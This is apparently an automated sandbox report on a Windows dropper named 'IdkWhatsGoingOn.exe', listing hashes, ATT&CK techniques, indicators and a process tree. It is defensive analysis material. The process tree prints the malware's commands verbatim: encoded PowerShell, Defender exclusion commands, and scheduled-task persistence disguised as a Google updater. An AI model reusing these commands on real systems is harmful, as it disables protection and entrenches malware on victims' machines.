4231822a26de5053ef9413968c254f8f4e6b4b345a7ccf4689b3d00ee879c3ab

Analysis

max time kernel
150s
max time network
153s
platform
windows7_x64
resource
win7-20241010-en
resource tags

arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
submitted
22/11/2024, 17:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

IdkWhatsGoingOn.exe
Size

5.7MB
MD5

68a8d7bdb7daeee5d2bf27bf36092794
SHA1

4db786dc2fd0506e7123b43ad8f2b7820b01bbad
SHA256

4231822a26de5053ef9413968c254f8f4e6b4b345a7ccf4689b3d00ee879c3ab
SHA512

878dcf38473b159c6d4d866a9bfa8cce38da070efa4e157c4a34d378e952fd26b9a1e76aeb0c117b11574af7916e56bbf6ca0156bac0e075da397439b297dc47
SSDEEP

98304:w3dhPozxID/ISjmbE+4Q4prv2EiXXFGz/jWhG150OUvug1CJYE:MnHrlmnsv2nkzyhM50OUO

Score

10^/10

defense_evasion discovery evasion execution persistence

Malware Config

Signatures

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\MpsSvc\Parameters\PortKeywords\DHCP	svchost.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Parameters\PortKeywords\DHCP\Collection	svchost.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 9 IoCs

description	pid	Process	procid_target
PID 2160 created 1212	2160	Google ChromeUP.exe	21
PID 2160 created 1212	2160	Google ChromeUP.exe	21
PID 2160 created 1212	2160	Google ChromeUP.exe	21
PID 2160 created 1212	2160	Google ChromeUP.exe	21
PID 2424 created 1212	2424	updater.exe	21
PID 2424 created 1212	2424	updater.exe	21
PID 2424 created 1212	2424	updater.exe	21
PID 2424 created 1212	2424	updater.exe	21
PID 2424 created 1212	2424	updater.exe	21

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2824	powershell.exe
2664	powershell.exe
3040	powershell.exe
2980	powershell.exe

Sets service image path in registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinRing0_1_2_0\ImagePath = "\\??\\C:\\Program Files\\Google\\Libs\\WR64.sys"	services.exe

Executes dropped EXE 2 IoCs

pid	Process
2160	Google ChromeUP.exe
2424	updater.exe

Indicator Removal: Clear Windows Event Logs 1 TTPs 1 IoCs

Clear Windows Event Logs to hide the activity of an intrusion.

defense_evasion

Clear Windows Event Logs

T1070.001

description	ioc	Process
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Known Folders API Service.evtx	svchost.exe

Loads dropped DLL 2 IoCs

pid	Process
1736	IdkWhatsGoingOn.exe
2004	taskeng.exe

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Drops file in System32 directory 6 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File created	C:\Windows\System32\Tasks\GoogleUpdateTaskMachineQC	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\GoogleUpdateTaskMachineQC	svchost.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 2160 set thread context of 2800	2160	Google ChromeUP.exe	37
PID 2424 set thread context of 2580	2424	updater.exe	47
PID 2424 set thread context of 2444	2424	updater.exe	51
PID 2424 set thread context of 112	2424	updater.exe	52

Drops file in Program Files directory 2 IoCs

description	ioc	Process
File created	C:\Program Files\Google\Chrome\updater.exe	Google ChromeUP.exe
File created	C:\Program Files\Google\Libs\WR64.sys	updater.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\appcompat\programs\RecentFileCache.bcf	svchost.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IdkWhatsGoingOn.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key security queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	wmiprvse.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 40429f2b023ddb01	powershell.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
632	schtasks.exe
2884	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2364	powershell.exe
2424	powershell.exe
2160	Google ChromeUP.exe
2160	Google ChromeUP.exe
3040	powershell.exe
2160	Google ChromeUP.exe
2160	Google ChromeUP.exe
2160	Google ChromeUP.exe
2160	Google ChromeUP.exe
2800	dialer.exe
2800	dialer.exe
2800	dialer.exe
2800	dialer.exe
2824	powershell.exe
2800	dialer.exe
2800	dialer.exe
2800	dialer.exe
2800	dialer.exe
2800	dialer.exe
2800	dialer.exe
2800	dialer.exe
2800	dialer.exe
2800	dialer.exe
2800	dialer.exe
2800	dialer.exe
2800	dialer.exe
2800	dialer.exe
2800	dialer.exe
2160	Google ChromeUP.exe
2160	Google ChromeUP.exe
2800	dialer.exe
2800	dialer.exe
2800	dialer.exe
2800	dialer.exe
2800	dialer.exe
2800	dialer.exe
2800	dialer.exe
2800	dialer.exe
2800	dialer.exe
2800	dialer.exe
2800	dialer.exe
2800	dialer.exe
2800	dialer.exe
2800	dialer.exe
2800	dialer.exe
2800	dialer.exe
2800	dialer.exe
2800	dialer.exe
2800	dialer.exe
2800	dialer.exe
2800	dialer.exe
2800	dialer.exe
2800	dialer.exe
2800	dialer.exe
2800	dialer.exe
2800	dialer.exe
2800	dialer.exe
2800	dialer.exe
2800	dialer.exe
2800	dialer.exe
2800	dialer.exe
2800	dialer.exe
2800	dialer.exe
2800	dialer.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
460	services.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2364	powershell.exe
Token: SeDebugPrivilege	2424	powershell.exe
Token: SeDebugPrivilege	3040	powershell.exe
Token: SeDebugPrivilege	2800	dialer.exe
Token: SeDebugPrivilege	2824	powershell.exe
Token: SeAuditPrivilege	848	svchost.exe
Token: SeAuditPrivilege	848	svchost.exe
Token: SeDebugPrivilege	2980	powershell.exe
Token: SeAuditPrivilege	848	svchost.exe
Token: SeDebugPrivilege	2580	dialer.exe
Token: SeDebugPrivilege	2664	powershell.exe
Token: SeLockMemoryPrivilege	112	dialer.exe
Token: SeLoadDriverPrivilege	460	services.exe
Token: SeBackupPrivilege	460	services.exe
Token: SeRestorePrivilege	460	services.exe
Token: SeSecurityPrivilege	460	services.exe
Token: SeTakeOwnershipPrivilege	460	services.exe
Token: SeAssignPrimaryTokenPrivilege	848	svchost.exe
Token: SeIncreaseQuotaPrivilege	848	svchost.exe
Token: SeSecurityPrivilege	848	svchost.exe
Token: SeTakeOwnershipPrivilege	848	svchost.exe
Token: SeLoadDriverPrivilege	848	svchost.exe
Token: SeSystemtimePrivilege	848	svchost.exe
Token: SeBackupPrivilege	848	svchost.exe
Token: SeRestorePrivilege	848	svchost.exe
Token: SeShutdownPrivilege	848	svchost.exe
Token: SeSystemEnvironmentPrivilege	848	svchost.exe
Token: SeUndockPrivilege	848	svchost.exe
Token: SeManageVolumePrivilege	848	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	848	svchost.exe
Token: SeIncreaseQuotaPrivilege	848	svchost.exe
Token: SeSecurityPrivilege	848	svchost.exe
Token: SeTakeOwnershipPrivilege	848	svchost.exe
Token: SeLoadDriverPrivilege	848	svchost.exe
Token: SeSystemtimePrivilege	848	svchost.exe
Token: SeBackupPrivilege	848	svchost.exe
Token: SeRestorePrivilege	848	svchost.exe
Token: SeShutdownPrivilege	848	svchost.exe
Token: SeSystemEnvironmentPrivilege	848	svchost.exe
Token: SeUndockPrivilege	848	svchost.exe
Token: SeManageVolumePrivilege	848	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	848	svchost.exe
Token: SeIncreaseQuotaPrivilege	848	svchost.exe
Token: SeSecurityPrivilege	848	svchost.exe
Token: SeTakeOwnershipPrivilege	848	svchost.exe
Token: SeLoadDriverPrivilege	848	svchost.exe
Token: SeSystemtimePrivilege	848	svchost.exe
Token: SeBackupPrivilege	848	svchost.exe
Token: SeRestorePrivilege	848	svchost.exe
Token: SeShutdownPrivilege	848	svchost.exe
Token: SeSystemEnvironmentPrivilege	848	svchost.exe
Token: SeUndockPrivilege	848	svchost.exe
Token: SeManageVolumePrivilege	848	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	848	svchost.exe
Token: SeIncreaseQuotaPrivilege	848	svchost.exe
Token: SeSecurityPrivilege	848	svchost.exe
Token: SeTakeOwnershipPrivilege	848	svchost.exe
Token: SeLoadDriverPrivilege	848	svchost.exe
Token: SeSystemtimePrivilege	848	svchost.exe
Token: SeBackupPrivilege	848	svchost.exe
Token: SeRestorePrivilege	848	svchost.exe
Token: SeShutdownPrivilege	848	svchost.exe
Token: SeSystemEnvironmentPrivilege	848	svchost.exe
Token: SeUndockPrivilege	848	svchost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1736 wrote to memory of 2364	1736	IdkWhatsGoingOn.exe	30
PID 1736 wrote to memory of 2364	1736	IdkWhatsGoingOn.exe	30
PID 1736 wrote to memory of 2364	1736	IdkWhatsGoingOn.exe	30
PID 1736 wrote to memory of 2364	1736	IdkWhatsGoingOn.exe	30
PID 1736 wrote to memory of 2424	1736	IdkWhatsGoingOn.exe	32
PID 1736 wrote to memory of 2424	1736	IdkWhatsGoingOn.exe	32
PID 1736 wrote to memory of 2424	1736	IdkWhatsGoingOn.exe	32
PID 1736 wrote to memory of 2424	1736	IdkWhatsGoingOn.exe	32
PID 1736 wrote to memory of 2160	1736	IdkWhatsGoingOn.exe	34
PID 1736 wrote to memory of 2160	1736	IdkWhatsGoingOn.exe	34
PID 1736 wrote to memory of 2160	1736	IdkWhatsGoingOn.exe	34
PID 1736 wrote to memory of 2160	1736	IdkWhatsGoingOn.exe	34
PID 2160 wrote to memory of 2800	2160	Google ChromeUP.exe	37
PID 2800 wrote to memory of 416	2800	dialer.exe	5
PID 2800 wrote to memory of 460	2800	dialer.exe	6
PID 2800 wrote to memory of 476	2800	dialer.exe	7
PID 2800 wrote to memory of 484	2800	dialer.exe	8
PID 2800 wrote to memory of 596	2800	dialer.exe	9
PID 2800 wrote to memory of 672	2800	dialer.exe	10
PID 2800 wrote to memory of 748	2800	dialer.exe	11
PID 2800 wrote to memory of 812	2800	dialer.exe	12
PID 2800 wrote to memory of 848	2800	dialer.exe	13
PID 2800 wrote to memory of 996	2800	dialer.exe	15
PID 2800 wrote to memory of 340	2800	dialer.exe	16
PID 2800 wrote to memory of 360	2800	dialer.exe	17
PID 2800 wrote to memory of 1068	2800	dialer.exe	18
PID 2800 wrote to memory of 1112	2800	dialer.exe	19
PID 2800 wrote to memory of 1176	2800	dialer.exe	20
PID 2800 wrote to memory of 1212	2800	dialer.exe	21
PID 2800 wrote to memory of 1576	2800	dialer.exe	23
PID 2800 wrote to memory of 948	2800	dialer.exe	24
PID 2800 wrote to memory of 2688	2800	dialer.exe	26
PID 2800 wrote to memory of 2720	2800	dialer.exe	27
PID 2800 wrote to memory of 2164	2800	dialer.exe	31
PID 2800 wrote to memory of 2160	2800	dialer.exe	34
PID 2800 wrote to memory of 2824	2800	dialer.exe	38
PID 2800 wrote to memory of 2840	2800	dialer.exe	39
PID 2824 wrote to memory of 632	2824	powershell.exe	40
PID 2824 wrote to memory of 632	2824	powershell.exe	40
PID 2824 wrote to memory of 632	2824	powershell.exe	40
PID 2800 wrote to memory of 632	2800	dialer.exe	40
PID 2800 wrote to memory of 632	2800	dialer.exe	40
PID 2800 wrote to memory of 2628	2800	dialer.exe	41
PID 2800 wrote to memory of 1816	2800	dialer.exe	42
PID 2800 wrote to memory of 2004	2800	dialer.exe	43
PID 848 wrote to memory of 2004	848	svchost.exe	43
PID 848 wrote to memory of 2004	848	svchost.exe	43
PID 848 wrote to memory of 2004	848	svchost.exe	43
PID 2800 wrote to memory of 2004	2800	dialer.exe	43
PID 2800 wrote to memory of 2424	2800	dialer.exe	44
PID 2004 wrote to memory of 2424	2004	taskeng.exe	44
PID 2004 wrote to memory of 2424	2004	taskeng.exe	44
PID 2004 wrote to memory of 2424	2004	taskeng.exe	44
PID 2800 wrote to memory of 2424	2800	dialer.exe	44
PID 2800 wrote to memory of 2980	2800	dialer.exe	45
PID 2800 wrote to memory of 2812	2800	dialer.exe	46
PID 2424 wrote to memory of 2580	2424	updater.exe	47
PID 2800 wrote to memory of 2664	2800	dialer.exe	48
PID 2800 wrote to memory of 1500	2800	dialer.exe	49
PID 2580 wrote to memory of 416	2580	dialer.exe	5
PID 2580 wrote to memory of 460	2580	dialer.exe	6
PID 2580 wrote to memory of 476	2580	dialer.exe	7
PID 2580 wrote to memory of 484	2580	dialer.exe	8
PID 2580 wrote to memory of 596	2580	dialer.exe	9

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:416

C:\Windows\system32\services.exe
C:\Windows\system32\services.exe
1⤵
- Sets service image path in registry
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:460
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k DcomLaunch
  2⤵
  PID:596
- - C:\Windows\system32\DllHost.exe
    C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
    3⤵
    PID:1576
- - C:\Windows\system32\wbem\wmiprvse.exe
    C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
    3⤵
    - Checks processor information in registry
    PID:2044
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k RPCSS
  2⤵
  PID:672
- C:\Windows\System32\svchost.exe
  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
  2⤵
  - Modifies security service
  - Indicator Removal: Clear Windows Event Logs
  PID:748
- C:\Windows\System32\svchost.exe
  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
  2⤵
  PID:812
- - C:\Windows\system32\Dwm.exe
    "C:\Windows\system32\Dwm.exe"
    3⤵
    PID:1176
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k netsvcs
  2⤵
  - Drops file in System32 directory
  - Drops file in Windows directory
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:848
- - C:\Windows\system32\taskeng.exe
    taskeng.exe {106036DC-2C28-4D63-82C4-55866189B456} S-1-5-18:NT AUTHORITY\System:Service:
    3⤵
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:2004
  - - C:\Program Files\Google\Chrome\updater.exe
      "C:\Program Files\Google\Chrome\updater.exe"
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Drops file in Program Files directory
      Suspicious use of WriteProcessMemory
      PID:2424
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalService
  2⤵
  PID:996
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k NetworkService
  2⤵
  PID:340
- C:\Windows\System32\spoolsv.exe
  C:\Windows\System32\spoolsv.exe
  2⤵
  PID:360
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
  2⤵
  PID:1068
- C:\Windows\system32\taskhost.exe
  "taskhost.exe"
  2⤵
  PID:1112
- C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
  "C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"
  2⤵
  PID:948
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
  2⤵
  PID:2688
- C:\Windows\system32\sppsvc.exe
  C:\Windows\system32\sppsvc.exe
  2⤵
  PID:2720

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:476

C:\Windows\system32\lsm.exe
C:\Windows\system32\lsm.exe
1⤵
PID:484

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:1212
- C:\Users\Admin\AppData\Local\Temp\IdkWhatsGoingOn.exe
  "C:\Users\Admin\AppData\Local\Temp\IdkWhatsGoingOn.exe"
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1736
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAbQBtACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGYAcQBmACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAVwBBAFIATgBJAE4ARwA6ACAATgBvACAAVgBpAHMAdQBhAGwAIABDACsAKwAgAGkAbgBzAHQAYQBsAGwAYQB0AGkAbwBuACAAdwBhAHMAIABmAG8AdQBuAGQALgAgAFAAbABlAGEAcwBlACAAZABvAHcAbgBsAG8AYQBkACAAYQBuAGQAIABpAG4AcwB0AGEAbABsACAAVgBpAHMAdQBhAGwAIABTAHQAdQBkAGkAbwAgADIAMAAxADcAIAB3AGkAdABoACAAQwArACsAIABjAG8AbQBwAG8AbgBlAG4AdABzAC4AJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHEAegBlACMAPgA="
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2364
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAbgB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHoAcQBnACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHUAcQBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGsAeQByACMAPgA="
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2424
- - C:\Users\Admin\AppData\Local\Temp\Google ChromeUP.exe
    "C:\Users\Admin\AppData\Local\Temp\Google ChromeUP.exe"
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:2160
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3040
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2800
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#huipikb#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2824
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:632
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
  2⤵
  PID:2628
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2980
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2580
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#huipikb#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious use of AdjustPrivilegeToken
  PID:2664
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:2884
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  PID:2444
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:112

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "307022403-218746065-1676923338-102530715-299708864-1364067046-631019521342290470"
1⤵
PID:2164

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "17583541771724089270-844929602-580331018127876311724760754-18624246132042849693"
1⤵
PID:2840

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "14427525604881307011849628551-577109076-911937203796145370-926831286455888039"
1⤵
PID:1816

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "3837707341808014622-283885677384383719562783512938088883-606665924-1511892669"
1⤵
PID:2812

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-6867552581904834338-437349334-37813307519993219351936794735717816519269132621"
1⤵
PID:1500

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Indicator Removal

T1070

Clear Windows Event Logs

T1070.001

Modify Registry

T1112

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
2af6f5c96b21c50df419fab50f7e7904

SHA1
767f40fc5574ff146ab647faef14b3b6c5556174

SHA256
a88f61d8ca0ebb62dddf675c4dac760178fc25e4fb71304838d65c17a88811d9

SHA512
7b0085674b13762e4152d50738c3a08be7629fd8c9b26ffafc824c4588a9612cb60842f3f70fd30c4115743f43d7d3aa06a6f396556d37292c48f7e4a318a579

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
7229693febb0bd4ef20e9f955f6b812f

SHA1
f476e424f7fbb88bb2c96f64a50e18c2de124a86

SHA256
fa30c3c82892ec81119e40f05514a053c8d275fb048a9ae10feec89544228b84

SHA512
a82edb45f61d261066de485fa6d6dcbf7c368823e53336d18298a7951c672c362a4a73f55f68758088b3f8078cb465dc3fd3cc0536340885a47de948b83e3d7e

Download Submit
C:\Windows\System32\Tasks\GoogleUpdateTaskMachineQC

Filesize
3KB

MD5
3cfd301196d3ab822f639116dc85e6a5

SHA1
2bf89d538e2a5d43cf2f86d5807528e1d6c4da9b

SHA256
1a9796d18783f6919000223e4566c4ec54e9ae407ace2c45b350a3e5ac6974a6

SHA512
5f20ebb4109b585c03b89cd3a5b2b6ea64cb9c979a4e37db81f86db26d4aa22a8d524e84ba20c2906cc5868b37a4f371a43ad79f2a7555e9219a16fd619efcfc

Download Submit
\Users\Admin\AppData\Local\Temp\Google ChromeUP.exe

Filesize
5.7MB

MD5
d394c4b7b88447da08acf97d1b94594b

SHA1
29af6911ca953185de35fe639a4440b5398247dc

SHA256
5ff8dc3580c159851710de06c8d644560c4181d577f148085161e28461075aaa

SHA512
a9ba312134bb6a2aa0cd0779b3cb092986106d07a127e2cd7b85a42e81c6557d6cafe003c00cfbc92b7cd994e0fe358f87753bfd27f371a0d023b32dd78788e7

Download Submit
memory/416-27-0x0000000000810000-0x0000000000831000-memory.dmp

Filesize
132KB

